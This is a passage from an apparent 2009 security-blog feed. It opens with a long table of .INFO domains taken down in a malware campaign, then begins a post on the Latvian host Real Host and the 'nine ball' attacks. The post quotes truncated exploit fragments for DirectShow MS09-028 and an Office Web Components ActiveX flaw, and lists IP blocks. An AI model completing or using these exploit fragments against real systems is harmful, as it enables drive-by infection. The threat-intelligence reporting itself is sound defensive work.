<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL9.INFO<span> </span></td>
<td>BT0.INFO<span> </span></td>
<td>FG3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM8.INFO<span> </span></td>
<td>BU0.INFO<span> </span></td>
<td>FG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM9.INFO<span> </span></td>
<td>BU9.INFO<span> </span></td>
<td>FG8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN0.INFO<span> </span></td>
<td>BV0.INFO<span> </span></td>
<td>FH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN5.INFO<span> </span></td>
<td>BV2.INFO<span> </span></td>
<td>FH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN6.INFO<span> </span></td>
<td>BV5.INFO<span> </span></td>
<td>FH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN7.INFO<span> </span></td>
<td>BV7.INFO<span> </span></td>
<td>FH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN9.INFO<span> </span></td>
<td>BV8.INFO<span> </span></td>
<td>FH7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GP8.INFO<span> </span></td>
<td>BV9.INFO<span> </span></td>
<td>FH8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX2.INFO<span> </span></td>
<td>WGREATDREAM.COM<span> </span></td>
<td>FH9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX7.INFO<span> </span></td>
<td>GP0.INFO<span> </span></td>
<td>FI4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX9.INFO<span> </span></td>
<td>GQ0.INFO<span> </span></td>
<td>FJ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BY5.INFO<span> </span></td>
<td>GQ2.INFO<span> </span></td>
<td>FJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BZ9.INFO<span> </span></td>
<td>GQ3.INFO<span> </span></td>
<td>FJ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB0.INFO<span> </span></td>
<td>GQ4.INFO<span> </span></td>
<td>FJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB6.INFO<span> </span></td>
<td>GQ5.INFO<span> </span></td>
<td>FJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE3.INFO<span> </span></td>
<td>GQ9.INFO<span> </span></td>
<td>FJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE7.INFO<span> </span></td>
<td>GR6.INFO<span> </span></td>
<td>FJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF0.INFO<span> </span></td>
<td>GR9.INFO<span> </span></td>
<td>FJ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF3.INFO<span> </span></td>
<td>GS0.INFO<span> </span></td>
<td>FJ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF4.INFO<span> </span></td>
<td>GS3.INFO<span> </span></td>
<td>FK2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF5.INFO<span> </span></td>
<td>GS6.INFO<span> </span></td>
<td>JD0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF6.INFO<span> </span></td>
<td>GS9.INFO<span> </span></td>
<td>JD6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF7.INFO<span> </span></td>
<td>GU0.INFO<span> </span></td>
<td>JD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CG3.INFO<span> </span></td>
<td>GU4.INFO<span> </span></td>
<td>JD9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CI0.INFO<span> </span></td>
<td>GV0.INFO<span> </span></td>
<td>JE2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ0.INFO<span> </span></td>
<td>GV2.INFO<span> </span></td>
<td>JE4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ3.INFO<span> </span></td>
<td>GV3.INFO<span> </span></td>
<td>JF0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ8.INFO<span> </span></td>
<td>GV4.INFO<span> </span></td>
<td>JF2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL0.INFO<span> </span></td>
<td>GV5.INFO<span> </span></td>
<td>JF3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL5.INFO<span> </span></td>
<td>GV9.INFO<span> </span></td>
<td>JG0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL9.INFO<span> </span></td>
<td>GW0.INFO<span> </span></td>
<td>JG2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CM9.INFO<span> </span></td>
<td>GX0.INFO<span> </span></td>
<td>JG3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CO0.INFO<span> </span></td>
<td>GX2.INFO<span> </span></td>
<td>JG7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP0.INFO<span> </span></td>
<td>GX4.INFO<span> </span></td>
<td>JG8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP5.INFO<span> </span></td>
<td>GX5.INFO<span> </span></td>
<td>JG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP7.INFO<span> </span></td>
<td>GX6.INFO<span> </span></td>
<td>JH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ0.INFO<span> </span></td>
<td>GY0.INFO<span> </span></td>
<td>JH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ5.INFO<span> </span></td>
<td>GY2.INFO<span> </span></td>
<td>JH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ7.INFO<span> </span></td>
<td>GY4.INFO<span> </span></td>
<td>JH7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ8.INFO<span> </span></td>
<td>GY5.INFO<span> </span></td>
<td>JI0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ9.INFO<span> </span></td>
<td>GY6.INFO<span> </span></td>
<td>JI1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CS0.INFO<span> </span></td>
<td>GY7.INFO<span> </span></td>
<td>JI2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CS7.INFO<span> </span></td>
<td>GY9.INFO<span> </span></td>
<td>JI7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT0.INFO<span> </span></td>
<td>HB7.INFO<span> </span></td>
<td>JI9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT6.INFO<span> </span></td>
<td>HB8.INFO<span> </span></td>
<td>JK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT8.INFO<span> </span></td>
<td>HC0.INFO<span> </span></td>
<td>JK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU3.INFO<span> </span></td>
<td>HC4.INFO<span> </span></td>
<td>JL2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU4.INFO<span> </span></td>
<td>HC8.INFO<span> </span></td>
<td>JL3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU5.INFO<span> </span></td>
<td>HD0.INFO<span> </span></td>
<td>JL4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV0.INFO<span> </span></td>
<td>HE4.INFO<span> </span></td>
<td>JL5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV8.INFO<span> </span></td>
<td>HE5.INFO<span> </span></td>
<td>JL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV9.INFO<span> </span></td>
<td>HE7.INFO<span> </span></td>
<td>JL9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW0.INFO<span> </span></td>
<td>HF0.INFO<span> </span></td>
<td>JM0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW4.INFO<span> </span></td>
<td>HF6.INFO<span> </span></td>
<td>JM3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW5.INFO<span> </span></td>
<td>HF7.INFO<span> </span></td>
<td>JM6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW8.INFO<span> </span></td>
<td>HF8.INFO<span> </span></td>
<td>JM7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW9.INFO<span> </span></td>
<td>HF9.INFO<span> </span></td>
<td>JN2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX0.INFO<span> </span></td>
<td>HG3.INFO<span> </span></td>
<td>JN7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX5.INFO<span> </span></td>
<td>HG4.INFO<span> </span></td>
<td>JN8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX6.INFO<span> </span></td>
<td>HG5.INFO<span> </span></td>
<td>JN9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY2.INFO<span> </span></td>
<td>HG6.INFO<span> </span></td>
<td>JO0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY3.INFO<span> </span></td>
<td>HG8.INFO<span> </span></td>
<td>JQ1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY6.INFO<span> </span></td>
<td>HG9.INFO<span> </span></td>
<td>JQ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY7.INFO<span> </span></td>
<td>HJ2.INFO<span> </span></td>
<td>JQ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ0.INFO<span> </span></td>
<td>HJ3.INFO<span> </span></td>
<td>JQ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ7.INFO<span> </span></td>
<td>HJ5.INFO<span> </span></td>
<td>JQ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ9.INFO<span> </span></td>
<td>HJ6.INFO<span> </span></td>
<td>JQ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA3.INFO<span> </span></td>
<td>HJ7.INFO<span> </span></td>
<td>JQ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA6.INFO<span> </span></td>
<td>HJ8.INFO<span> </span></td>
<td>JQ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA7.INFO<span> </span></td>
<td>HJ9.INFO<span> </span></td>
<td>JR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DB5.INFO<span> </span></td>
<td>HK0.INFO<span> </span></td>
<td>JS3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DB6.INFO<span> </span></td>
<td>HK3.INFO<span> </span></td>
<td>JS4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE4.INFO<span> </span></td>
<td>HK4.INFO<span> </span></td>
<td>JS5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE5.INFO<span> </span></td>
<td>HL0.INFO<span> </span></td>
<td>JS8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE6.INFO<span> </span></td>
<td>HL6.INFO<span> </span></td>
<td>JS9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE8.INFO<span> </span></td>
<td>HL9.INFO<span> </span></td>
<td>JT0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DF5.INFO<span> </span></td>
<td>HM4.INFO<span> </span></td>
<td>JT3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DF6.INFO<span> </span></td>
<td>HN0.INFO<span> </span></td>
<td>JT4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DG0.INFO<span> </span></td>
<td>HN3.INFO<span> </span></td>
<td>JT5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DH3.INFO<span> </span></td>
<td>HN4.INFO<span> </span></td>
<td>JT9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DH9.INFO<span> </span></td>
<td>HN5.INFO<span> </span></td>
<td>JU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI0.INFO<span> </span></td>
<td>HN6.INFO<span> </span></td>
<td>JU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI3.INFO<span> </span></td>
<td>HN9.INFO<span> </span></td>
<td>JV0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI4.INFO<span> </span></td>
<td>HO0.INFO<span> </span></td>
<td>JV3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI8.INFO<span> </span></td>
<td>HP0.INFO<span> </span></td>
<td>JV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DJ3.INFO<span> </span></td>
<td>HR6.INFO<span> </span></td>
<td>JV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DJ7.INFO<span> </span></td>
<td>HS0.INFO<span> </span></td>
<td>JV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK0.INFO<span> </span></td>
<td>HS7.INFO<span> </span></td>
<td>JV8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK5.INFO<span> </span></td>
<td>HS8.INFO<span> </span></td>
<td>JW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK7.INFO<span> </span></td>
<td>HS9.INFO<span> </span></td>
<td>JW7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK8.INFO<span> </span></td>
<td>HT6.INFO<span> </span></td>
<td>JW8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DL0.INFO<span> </span></td>
<td>HU0.INFO<span> </span></td>
<td>JW9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DM0.INFO<span> </span></td>
<td>HU3.INFO<span> </span></td>
<td>JX1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DM4.INFO<span> </span></td>
<td>HU4.INFO<span> </span></td>
<td>JX2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP0.INFO<span> </span></td>
<td>HU6.INFO<span> </span></td>
<td>JX3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP3.INFO<span> </span></td>
<td>HU7.INFO<span> </span></td>
<td>JX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP6.INFO<span> </span></td>
<td>HV0.INFO<span> </span></td>
<td>JX8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP7.INFO<span> </span></td>
<td>HW4.INFO<span> </span></td>
<td>JY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DQ0.INFO<span> </span></td>
<td>HW6.INFO<span> </span></td>
<td>JY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DQ2.INFO<span> </span></td>
<td>HW7.INFO<span> </span></td>
<td>JY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DR0.INFO<span> </span></td>
<td>HW8.INFO<span> </span></td>
<td>JY5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DS7.INFO<span> </span></td>
<td>HX3.INFO<span> </span></td>
<td>JY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT3.INFO<span> </span></td>
<td>HX5.INFO<span> </span></td>
<td>JY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT5.INFO<span> </span></td>
<td>HX6.INFO<span> </span></td>
<td>JY9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT6.INFO<span> </span></td>
<td>HX7.INFO<span> </span></td>
<td>JZ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT7.INFO<span> </span></td>
<td>HX9.INFO<span> </span></td>
<td>JZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT8.INFO<span> </span></td>
<td>KD0.INFO<span> </span></td>
<td>JZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT9.INFO<span> </span></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Real Host, Latvia &#8211; RBN Resurgence or Clone</title>
		<link>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/</link>
		<comments>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/#comments</comments>
		<pubDate>Fri, 31 Jul 2009 16:05:01 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[moneymule]]></category>
		<category><![CDATA[ninebal]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[realhost]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=378</guid>
		<description><![CDATA[A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 &#124; Part 2) The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. [...]]]></description>
			<content:encoded><![CDATA[<p>A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (<a title="nine ball attack follow up 1" href="http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/" target="_blank">Part 1</a> | <a class="wpGallery" title="nine ball attack follow up 2" href="http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/" target="_blank">Part 2</a>)</p>
<p>The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.</p>
<p>Directshow &#8211; MS09-028 (previously a 0day, patched recently)</p>
<p>function directshow()<br />
{<br />
var shellcode=unescape(&#8220;%uC033&#8230;.</p>
<p>obj.data=&#8217;./directshow.php&#8217;;<br />
obj.classid=&#8217;clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF&#8217;;</p>
<p>Microsoft Office Web Components (unpatched 0day)</p>
<p>function spreadsheet()<br />
{<br />
try<br />
{<br />
var objspread=new ActiveXObject(&#8216;OWC10.Spreadsheet&#8217;);<br />
}</p>
<p>After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog <a title="dynamoo blog" href="http://www.dynamoo.com/blog/2009/07/real-host-ltd-is-real-sewer.html" target="_blank">written by Dynamoo</a> where the activities of this host are first uncovered. Delving deeper into this provider  it is  apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from <a title="hostexploit" href="http://hostexploit.com" target="_blank">HostExploit.com</a>. Jart will present a higher level view of Real Host&#8217;s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).</p>
<p>It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.</p>
<p>Observed Hostile Activity:</p>
<ul>
<li>Exploits including unpatched (or soon to be patched) 0days</li>
<li>Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan</li>
<li>Phishing sites</li>
<li>Moneymule recruitment sites</li>
<li>Botnet Command and Control servers</li>
<li>Hosting of cybercrime websites &#8211; Iframe programs</li>
<li>Distributing licensed software (Warez)</li>
</ul>
<p>Real Host has 3 /28 IP blocks (48 IPs) that they get from  Junik (AS8206), these are:</p>
<p>inetnum: 213.182.197.0 &#8211; 213.182.197.15<br />
netname: Real_Host_NET3<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abuseemaildhcp@gmail.com</p>
<p>inetnum: 213.182.197.224 &#8211; 213.182.197.239<br />
netname: Real_Host_NET1<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abuseemaildhcp@gmail.com</p>
<p>inetnum: 213.182.197.240 &#8211; 213.182.197.255<br />
netname: Real_Host_NET2<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abusemailhost@gmail.com</p>
<p>The first indication of suspicious activity is the use of gmail addresses as abuse contacts.</p>
<p>Next, here is data from my security tools showing attacks and the dates associated with them:</p>
